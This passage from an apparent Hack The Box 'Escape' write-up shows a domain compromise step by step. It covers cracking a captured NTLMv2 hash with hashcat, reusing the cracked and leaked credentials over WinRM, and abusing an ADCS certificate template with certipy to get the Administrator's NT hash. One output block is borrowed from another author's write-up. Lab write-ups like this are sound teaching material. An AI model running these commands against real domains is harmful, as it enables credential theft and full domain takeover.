[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:556a5a7d477831c5:33B75B11E4F760CEEB28F23B2CF29A81:010100000000000000F059621AD9DB0198F3616672CAEBDB0000000002000800310052003900320001001E00570049004E002D004200540046004500440058003700490044004300340004003400570049004E002D00420054004600450044005800370049004400430034002E0031005200390032002E004C004F00430041004C000300140031005200390032002E004C004F00430041004C000500140031005200390032002E004C004F00430041004C000700080000F059621AD9DB0106000400020000000800300030000000000000000000000000300000182B65B5A88747C57166D8036E24AFD50499F40FEC449E70B88A984A4F67D7980A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0038000000000000000000

Hashcat

1
2
3
4
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ sudo hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt --force

SQL_SVC::sequel:556a5a7d477831c5:33b75b11e4f760ceeb28f23b2cf29a81:010100000000000000f059621ad9db0198f3616672caebdb0000000002000800310052003900320001001e00570049004e002d004200540046004500440058003700490044004300340004003400570049004e002d00420054004600450044005800370049004400430034002e0031005200390032002e004c004f00430041004c000300140031005200390032002e004c004f00430041004c000500140031005200390032002e004c004f00430041004c000700080000f059621ad9db0106000400020000000800300030000000000000000000000000300000182b65b5a88747c57166d8036e24afd50499f40fec449e70b88a984a4f67d7980a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:REGGIE1234ronnie

Good, we got another set of credentials.

1
2
3
4
5
6
7
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie'
SMB         10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)

Good! We can log in to the target machine now!

Post Exploitation

SQLServer ErrorLog Backup

1
2
3
4
5
6
*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK
                                        
Info: Downloading C:\SQLServer\Logs\ERRORLOG.BAK to ERRORLOG.BAK
                                        
Info: Download successful!
*Evil-WinRM* PS C:\SQLServer\Logs>
1
2
3
4
5
6
7
8
9
2022-11-18 13:43:07.44 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51      Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51      Changed language setting to us_english.

It seems like Ryan accidentally used his password as the username to log in, and it was cached inside the error log. We can try to verify this:

1
2
3
4
5
6
7
8
9
10
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'      
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3

┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3' 2>/dev/null
SMB         10.10.11.202    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP        10.10.11.202    5985   DC               [*] http://10.10.11.202:5985/wsman
WINRM       10.10.11.202    5985   DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)
1
2
3
4
5
6
7
8
9
10
11
12
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ certipy-ad req -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip '10.10.11.202' -template 'UserAuthentication' -target 'dc.sequel.htb' -upn 'Administrator@sequel.htb' -ca 'sequel-DC-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
  "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
1
2
3
4
5
6
7
8
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Error again. It should work at this point; we’ll just skip this.

1
2
3
4
5
6
7
8
9
oxdf@hacky$ certipy auth -pfx administrator.pfx 
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
This post is licensed under CC BY 4.0 by the author.